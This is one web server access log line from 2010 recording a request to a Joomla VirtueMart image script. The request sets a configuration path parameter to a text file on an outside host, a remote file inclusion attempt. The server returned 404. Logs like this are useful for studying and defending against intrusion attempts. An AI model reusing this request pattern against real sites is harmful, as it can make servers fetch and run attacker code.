220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
